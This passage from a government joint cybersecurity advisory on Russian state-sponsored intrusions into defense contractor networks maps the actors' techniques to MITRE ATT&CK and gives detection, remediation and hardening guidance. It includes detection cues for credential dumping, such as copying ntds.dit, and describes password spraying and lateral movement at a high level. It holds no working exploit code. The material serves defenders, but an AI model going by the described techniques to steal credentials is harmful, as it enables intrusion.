[[TA0008](<https://attack.mitre.org/versions/v10/tactics/TA0008>)]**\n\n| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)] | Threat actors used valid accounts for persistence. After some victims reset passwords for individually compromised accounts, the actors pivoted to other accounts, as needed, to maintain access. \n**Discovery [[TA0007](<https://attack.mitre.org/tactics/TA0007>)]** | File and Network Discovery [[T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>)] | After gaining access to networks, the threat actors used BloodHound to map the Active Directory. \n**Discovery [[TA0007](<https://attack.mitre.org/versions/v10/tactics/TA0007>)]** | Domain Trust Discovery [[T1482](<https://attack.mitre.org/versions/v10/techniques/T1482/>)] | Threat actors gathered information on domain trust relationships that were used to identify lateral movement opportunities. \n**Command and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]** | Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)] | Threat actors used multiple disparate nodes, such as VPSs, to route traffic to the target. \n \n### \n\n### Detection\n\nThe FBI, NSA, and CISA urge all CDCs to investigate suspicious activity in their enterprise and cloud environments. _**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom._\n\n#### **Detect Unusual Activity**\n\n**Implement robust log collection and retention.** Robust logging is critical for detecting unusual activity. Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, tools and solutions include:\n\n * Cloud native solutions, such as cloud-native security incident and event management (SIEM) tools.\n * Third-party tools, such as Sparrow, to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. _**Note:** for guidance on using these and other detection tools, refer to CISA Cybersecurity Advisory [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)._\n\n#### **Look for Evidence of Known TTPs**\n\n * **Look for behavioral evidence or network and host-based artifacts** from known TTPs associated with this activity. To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for frequent, failed authentication attempts across multiple accounts. \n * To detect use of compromised credentials in combination with a VPS, follow the steps below: \n * **Review logs for suspicious \u201cimpossible logins,\u201d** such as logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n * **Look for one IP used for multiple accounts,** excluding expected logins.\n * **Search for \u201cimpossible travel,\u201d **which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). _**Note:** this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks._\n * **Evaluate processes and program execution command-line arguments** that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller. \n * Identify suspicious privileged account use after resetting passwords or applying user account mitigations. \n * **Review logs for unusual activity** in typically dormant accounts.\n * **Look for unusual user agent strings,** such as strings not typically associated with normal user activity, which may indicate bot activity.\n\n### Incident Response and Remediation\n\nOrganizations with evidence of compromise should assume full identity compromise and initiate a full identity reset.\n\n * **Reset passwords for all local accounts. **These accounts should include Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. It is essential to reset the password for the krbtgt account, as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. _**Note:** reset the krbtgt account twice and consecutively with a 10-hour waiting period between resets (i.e., perform the first krbtgt password reset, wait 10 hours, and then follow with a second krbtgt password reset). The krbtgt password resets may take a long time to propagate fully on large AD environments. Refer to Microsoft\u2019s [AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>) guidance and automation script for additional information. [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)][[5](<https://github.com/microsoft/New-KrbtgtKeys.ps1>)]_\n * **Reset all domain user, admin, and service account passwords. **\n\n_**Note:** for guidance on evicting advanced persistent threat (APT) actors from cloud and enterprise environments, refer to CISA Analysis Report [Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/Microsoft 365 (M365) Compromise](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a>). Although this guidance was drafted for federal agencies compromised by the Russian Foreign Intelligence Service (SVR) via the [SolarWinds Orion supply chain compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>), the steps provided in the Eviction Phase are applicable for all organizations crafting eviction plans for suspected APT actors._\n\n### Mitigations\n\nThe FBI, NSA, and CISA encourage all CDCs, with or without evidence of compromise, to apply the following mitigations to reduce the risk of compromise by this threat actor. While these mitigations are not intended to be all-encompassing, they address common TTPs observed in these intrusions and will help to mitigate against common malicious activity. \n\n#### **Implement Credential Hardening**\n\n##### **_Enable Multifactor Authentication_**\n\n * **Enable multifactor authentication (MFA)** for all users, without exception. Subsequent authentication may not require MFA, enabling the possibility to bypass MFA by reusing single factor authentication assertions (e.g., Kerberos authentication). Reducing the lifetime of assertions will cause account re-validation of their MFA requirements.[[6](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend Privileges and Accounts - Copy.pdf>)] Service accounts should not use MFA. Automation and platform features (e.g., Group Managed Service Accounts, gMSA) can provide automatic and periodic complex password management for service accounts, reducing the threat surface against single factor authentication assertions.[[7](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>)] \n\n##### **_Enforce Strong, Unique Passwords_**\n\n * **Require accounts to have strong, unique passwords.** Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.\n * **Enable password management functions**, such as Local Administrator Password Solution (LAPS), for local administrative accounts. This will reduce the burden of users managing passwords and encourage them to have strong passwords.\n\n##### **_Introduce Account Lockout and Time-Based Access Features_**\n\n * **Implement time-out and lock-out features** in response to repeated failed login attempts.\n * **Configure time-based access for accounts set at the admin level and higher. **For example, the Just-In-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When the account is needed, individual users submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.\n\n##### **_Reduce Credential Exposure_**\n\n * **Use virtualization solutions on modern hardware and software** to ensure credentials are securely stored, and protect credentials via capabilities, such as Windows Defender Credential Guard (CredGuard) and Trusted Platform Module (TPM).[[8](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage Modern Hardware Security Features - Copy.pdf>)] Protecting domain credentials with CredGuard requires configuration and has limitations in protecting other types of credentials (e.g., WDigest and local accounts).[[9](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>)][[10](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>)] CredGuard uses TPMs to protect stored credentials. TPMs function as a system integrity observer and trust anchor ensuring the integrity of the boot sequence and mechanisms (e.g., UEFI Secure Boot). Installation of Windows 11 requires TPM v2.0.[[11](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>)] Disabling WDigest and rolling expiring NTLM secrets in smartcards will further protect other credentials not protected by CredGuard.[[12](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>)][[13](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>)]\n\n#### **Establish Centralized Log Management**\n\n * **Create a centralized log management system. **Centralized logging applications allow network defenders to look for anomalous activity, such as out-of-place communications between devices or unaccountable login failures, in the network environment. \n * Forward all logs to a SIEM tool.\n * Ensure logs are searchable.\n * Retain critical and historic network activity logs for a minimum of 180 days. \n * **If using M365, enable Unified Audit Log (UAL)**\u2014M365\u2019s logging capability\u2014which contains events from Exchange Online, SharePoint online, OneDrive, Azure AD, Microsoft Teams, PowerBI, and other M365 services. \n * **Correlate logs, including M365 logs, from network and host security devices. **This correlation will help with detecting anomalous activity in the network environment and connecting it with potential anomalous activity in M365. \n\nIn addition to setting up centralized logging, organizations should:\n\n * **Ensure PowerShell logging is turned on. **Threat actors often use PowerShell to hide their malicious activities.[14] \n * **Update PowerShell instances to version 5.0 or later **and uninstall all earlier versions of PowerShell. Logs from prior versions are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities. \n * **Confirm PowerShell 5.0 instances have module, script block, and transcription logging** enabled.\n * **Monitor remote access/Remote Desktop Protocol (RDP) logs** and disable unused remote access/RDP ports.\n\n#### **Initiate a Software and Patch Management Program **\n\n * **Consider using a centralized patch management system.** Failure to deploy software patches in a timely manner makes an organization a target of opportunity, increasing its risk of compromise. Organizations can ensure timely patching of software vulnerabilities by implementing an enterprise-wide software and patch management program.[[15](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update and Upgrade Software Immediately.docx - Copy.pdf>)] \n * If an organization is unable to update all software shortly after a patch is released, **prioritize patches for CVEs that are already known **to be exploited or that would be accessible to the largest number of potential adversaries (such as internet-facing systems). \n * **Subscribe to [CISA cybersecurity notifications and advisories](<https://us-cert.cisa.gov/ncas>)** to keep up with known exploited vulnerabilities, security updates, and threats. This will assist organizations in maintaining situational awareness of critical software vulnerabilities and, if applicable, associated exploitation. \n * **Sign up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)**, including vulnerability scanning, to help reduce exposure to threats. CISA\u2019s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IPs for accessible services and vulnerabilities.\n\n#### **Employ Antivirus Programs **\n\n * **Ensure that antivirus applications are installed on all organizations\u2019 computers** and are configured to prevent spyware, adware, and malware as part of the operating system security baseline. \n * **Keep virus definitions up to date.**\n * **Regularly monitor antivirus scans.**\n\n#### **Use Endpoint Detection and Response Tools **\n\n * **Utilize endpoint detection and response (EDR) tools.** These tools allow a high degree of visibility into the security status of endpoints and can be an effective defense against threat actors. EDR tools are particularly useful for detecting lateral movement, as they have insight into common and uncommon network connections for each host. \n\n#### **Maintain Rigorous Configuration Management Programs **\n\n * **Audit configuration management programs **to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Having a robust configuration program hinders sophisticated threat operations by limiting the effectiveness of opportunistic attacks.[[16](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively Manage Systems and Configurations.docx - Copy.pdf>)] \n\n#### **Enforce the Principle of Least Privilege**\n\n * **Apply the principle of least privilege. **Administrator accounts should have the minimum permissions they need to do their tasks. This can reduce the impact if an administrator account is compromised. \n * **For M365, assign administrator roles to role-based access control (RBAC)** to implement the principle of least privilege. Given its high level of default privilege, you should only use the Global Administrator account when absolutely necessary. Using Azure AD\u2019s numerous other built-in administrator roles instead of the Global Administrator account can limit assigning unnecessary privileges. _**Note:** refer to the Microsoft documentation, [Azure AD built-in roles](<https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles>), for more information about Azure AD. _\n * **Remove privileges not expressly required by an account\u2019s function or role. **\n * **Ensure there are unique and distinct administrative accounts** for each set of administrative tasks. \n * **Create non-privileged accounts for privileged users, **and ensure they use the non- privileged accounts for all non-privileged access (e.g., web browsing, email access).\n * **Reduce the number of domain and enterprise administrator accounts, **and remove all accounts that are unnecessary.\n * **Regularly audit administrative user accounts.**\n * **Regularly audit logs to ensure new accounts are legitimate users.**\n * **Institute a group policy that disables remote interactive logins,** and use Domain Protected Users Group.\n\nTo assist with identifying suspicious behavior with administrative accounts:\n\n * **Create privileged role tracking.**\n * **Create a change control process** for all privilege escalations and role changes on user accounts.\n * **Enable alerts on privilege escalations and role changes.**\n * **Log privileged user changes** in the network environment, and create an alert for unusual events.\n\n#### **Review Trust Relationships**\n\n * **Review existing trust relationships with IT service providers,** such as managed service providers (MSPs) and cloud service providers (CSPs). Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data. \n * **Remove unnecessary trust relationships. **\n * **Review contractual relationships **with all service providers, and ensure contracts include: \n * Security controls the customer deems appropriate. \n * Appropriate monitoring and logging of provider-managed customer systems.\n * Appropriate monitoring of the service provider\u2019s presence, activities, and connections to the customer network.\n * Notification of confirmed or suspected security events and incidents occurring on the provider\u2019s infrastructure and administrative networks.\n\n_**Note: **review CISA\u2019s page on [APTs Targeting IT Service Provider Customers](<https://www.cisa.gov/uscert/APTs-Targeting-IT-Service-Provider-Customers>) and [CISA Insights: Mitigations and Hardening Guidance for MSPs and Small and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>) for additional recommendations for MSP and CSP customers._\n\n#### **Encourage Remote Work Environment Best Practices**\n\nWith the increase in remote work and use of VPN services due to COVID-19, the FBI, NSA, and CISA encourage regularly monitoring remote network traffic, along with employing the following best practices._ **Note:** for additional information, see joint NSA-CISA Cybersecurity Information Sheet: [Selecting and Hardening Remote Access VPN Solutions](<https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF>)._\n\n * **Regularly update VPNs, network infrastructure devices, and devices used for remote work environments **with the latest software patches and security configurations.\n * **When possible, require MFA on all VPN connections. **Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, mandate that employees engaging in remote work use strong passwords.\n * **Monitor network traffic for unapproved and unexpected protocols.**\n * **Reduce potential attack surfaces by discontinuing unused VPN servers** that may be used as a point of entry by adversaries.\n\n#### **Establish User Awareness Best Practices**\n\nCyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI, NSA, and CISA recommend the following best practices to improve employee operational security when conducting business:\n\n * **Provide end user awareness and training. **To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and how they are delivered. Also, provide users with training on information security principles and techniques.\n * **Inform employees of the risks of social engineering attacks,** e.g., risks associated with posting detailed career information to social or professional networking sites.\n * **Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyber intrusion** to help quickly and efficiently identify threats and employ mitigation strategies.\n\n#### **Apply Additional Best Practice Mitigations**\n\n * **Deny atypical inbound activity from known anonymization services, **including commercial VPN services and The Onion Router (TOR).\n * **Impose listing policies for applications and remote access** that only allow systems to execute known and permitted programs under an established security policy.\n * **Identify and create offline backups for critical assets.**\n * **Implement network segmentation.**\n * **Review CISA Alert **[AA20-120A: Microsoft Office 365 Security Recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa20-120a>) for additional recommendations on hardening M365 cloud environments.\n\n### Rewards for Justice Program\n\nIf you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State\u2019s Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which the Department is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact (202) 702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details, refer to [rewardsforjustice.net](<https://rewardsforjustice.net/terrorist-rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>).\n\n### Caveats\n\nThe information you have accessed or received is being provided \u201cas is\u201d for informational purposes only. The FBI, NSA, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, NSA, or CISA. \n\n### Contact Information\n\nTo report suspicious activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:cywatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:central@cisa.gov>). For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at (410) 854-4200 or [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). Defense Industrial Base companies may additionally sign up for NSA\u2019s free cybersecurity services, including Protective DNS, vulnerability scanning, and threat intelligence collaboration at [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>). \n\n### Appendix: Detailed Tactics, Techniques, and Procedures\n\n#### **Reconnaissance** [[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. The adversary is known for harvesting login credentials [[T1589.001](<https://attack.mitre.org/techniques/T1589/001>)].[[17](<https://attack.mitre.org/groups/G0007>)]\n\nID | **Name** | **Description** \n---|---|--- \nT1589.001 | Gather Victim Identity Information: Credentials | Adversaries may gather credentials that can be used during targeting. \n \n#### **Initial Access **[[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. For example, the adversary may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[18](<https://attack.mitre.org/groups/G0007>)] These specific actors obtained and abused credentials of domain [[T1078.002](<https://attack.mitre.org/techniques/T1078/002>)] and cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)].[[19](<https://attack.mitre.org/software/S0154/>)] The actors also used external remote services to gain access to systems [[T1133](<https://attack.mitre.org/techniques/T1133>)].[20] The adversary took advantage of weaknesses in internet-facing servers and conducted SQL injection attacks against organizations' external websites [[T1190](<https://attack.mitre.org/techniques/T1190>)].[[21](<https://attack.mitre.org/groups/G0007>)] Finally, they sent spearphishing emails with a malicious link in an attempt to gain access [[T1566.002](<https://attack.mitre.org/techniques/T1566/002>)].[22] \n\n\nID | Name | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. \nT1078.002 | Valid Accounts: Domain Accounts | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \nT1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \nT1133 | External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network. \nT1190 | Exploit Public-Facing Application | Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. \nT1566.002 | Phishing: Spearphishing Link | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. \n \n#### **Persistence **[[TA0003](<https://attack.mitre.org/tactics/TA0003>)]\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[23](<https://attack.mitre.org/groups/G0007>)] \n\nID | **Name ** | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \n \n#### **Privilege Escalation** [[TA0004](<https://attack.mitre.org/tactics/TA0004>)]\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[24](<https://attack.mitre.org/groups/G0007>)] Specifically in this case, credentials of cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)] were obtained and abused.[[25](<https://attack.mitre.org/software/S0154/>)] \n\nID | Name | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. \nT1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \n \n#### **Defense Evasion** [[TA0005](<https://attack.mitre.org/tactics/TA0005>)]\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. The adversary made its executables and files difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit [[T1027](<https://attack.mitre.org/techniques/T1027>)].[[26](<https://attack.mitre.org/software/S0410/>)] \n\n\nID | Name | Description \n---|---|--- \nT1027 | Obfuscated Files or Information | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. \n \n#### **Credential Access **[[TA0006](<https://attack.mitre.org/tactics/TA0006>)]\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. The adversary attempted to access or create a copy of the Active Directory (AD) domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights [[T1003.003](<https://attack.mitre.org/techniques/T1003/003>)].[[27](<https://attack.mitre.org/software/S0250/>)] The adversary also used a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials [[T1110.003](<https://attack.mitre.org/techniques/T1110/003>)].[[28](<https://attack.mitre.org/groups/G0007>)] \n\nID | Name | Description \n---|---|--- \nT1003.003 | OS Credential Dumping: NTDS | Adversaries may attempt to access or create a copy of the Active Directory domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. \nT1110.003 | Brute Force: Password Spraying | Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. \n \n#### **Discovery **[[TA0007](<https://attack.mitre.org/tactics/TA0007>)]\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. The adversary enumerated files and directories or searched in specific locations of a host or network share for certain information within a file system [[T1083](<https://attack.mitre.org/techniques/T1083>)].[29] In addition, the adversary attempted to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain or forest environments [[T1482](<https://attack.mitre.org/techniques/T1482>)].[30] \n\nID | Name | Description \n---|---|--- \nT1083 | File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \nT1482 | Domain Trust Discovery | Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. \n \n**Collection [[TA0009](<https://attack.mitre.org/tactics/TA0009>)]**\n\nCollection consists of both the techniques adversaries may use to gather information and the sources that information is collected from that are relevant to the adversary's objectives. The adversary leverages information repositories, such as SharePoint, to mine valuable information [[T1213.002](<https://attack.mitre.org/techniques/T1213/002>)].[[31](<https://attack.mitre.org/groups/G0007>)] \n\nID | Name | Description \n---|---|--- \nT1213.002 | Data from Information Repositories: SharePoint | Adversaries may leverage the SharePoint repository as a source to mine valuable information. \n \n**Command and Control [[TA0011](<https://attack.mitre.org/tactics/TA0011>)]**\n\nCommand and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. The adversary chained together multiple proxies to disguise the source of malicious traffic. In this case, TOR and VPN servers are used as multi-hop proxies to route C2 traffic and obfuscate their activities [[T1090.003](<https://attack.mitre.org/techniques/T1090/003>)].[[32](<https://attack.mitre.org/groups/G0007>)] \n\n\nID | Name | Description \n---|---|--- \nT1090.003 | Proxy: Multi-hop Proxy | To disguise the source of malicious traffic, adversaries may chain together multiple proxies. \n \n### Additional Resources\n\n[1] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021. \n[2] NSA Cybersecurity Advisory: [Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>), 7 October 2019. \n[3] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021. \n[4] Microsoft Article: [AD Forest Recovery \u2013 Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>), 29 July 2021. \n[5] Microsoft GitHub: [New-KrbtgtKeys.ps1](<https://github.com/microsoft/New-KrbtgtKeys.ps1>), 14 May 2020. \n[6] NSA Cybersecurity Information: [Defend Privileges and Accounts](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend Privileges and Accounts - Copy.pdf>), August 2019. \n[7] Microsoft Article: [Group Managed Service Accounts Overview](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>), 29 July 2021. \n[8] NSA Cybersecurity Information: [Leverage Modern Hardware Security Features](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage Modern Hardware Security Features - Copy.pdf>), August 2019. \n[9] Microsoft Article: [Protect derived domain credentials with Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>), 3 December 2021. \n[10] Microsoft Article: [Windows Defender Credential Guard protection limits](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>), 3 December 2021. \n[11] Microsoft Article: [Windows 11 requirements](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>), 30 November 2021. \n[12] Microsoft Blog Post: [The Importance of KB2871997 and KB2928120 for Credential Protection](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>), 20 September 2021. \n[13] Microsoft Article: [What\u2019s New in Credential Protection](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>), 7 January 2022. \n[14] NSA Cybersecurity Factsheet: [PowerShell: Security Risks and Defenses](<https://www.iad.gov/iad/library/ia-guidance/security-tips/powershell-security-risks-and-defenses.cfm>), 1 December 2016. \n[15] NSA Cybersecurity Information: [Update and Upgrade Software Immediately](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update and Upgrade Software Immediately.docx - Copy.pdf>), August 2019. \n[16] NSA Cybersecurity Information: [Actively Manage Systems and Configurations](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively Manage Systems and Configurations.docx - Copy.pdf>), August 2019. \n[17] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[18] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[19] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021. \n[20] Based on technical information shared by Mandiant. \n[21] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[22] Based on technical information shared by Mandiant. \n[23] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[24] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[25] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021. \n[26] MITRE Software: [Fysbis](<https://attack.mitre.org/software/S0410/>), 6 November 2020. \n[27] MITRE Software: [Koadic](<https://attack.mitre.org/software/S0250/>), 30 March 2020. \n[28] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[29] Based on technical information shared by Mandiant. \n[30] Based on technical information shared by Mandiant. \n[31] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[32] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021.\n\n### Revisions\n\nFebruary 16, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-16T12:00:00", "type": "ics", "title": "Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-16T12:00:00", "id": "AA22-047A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a", "cvss": 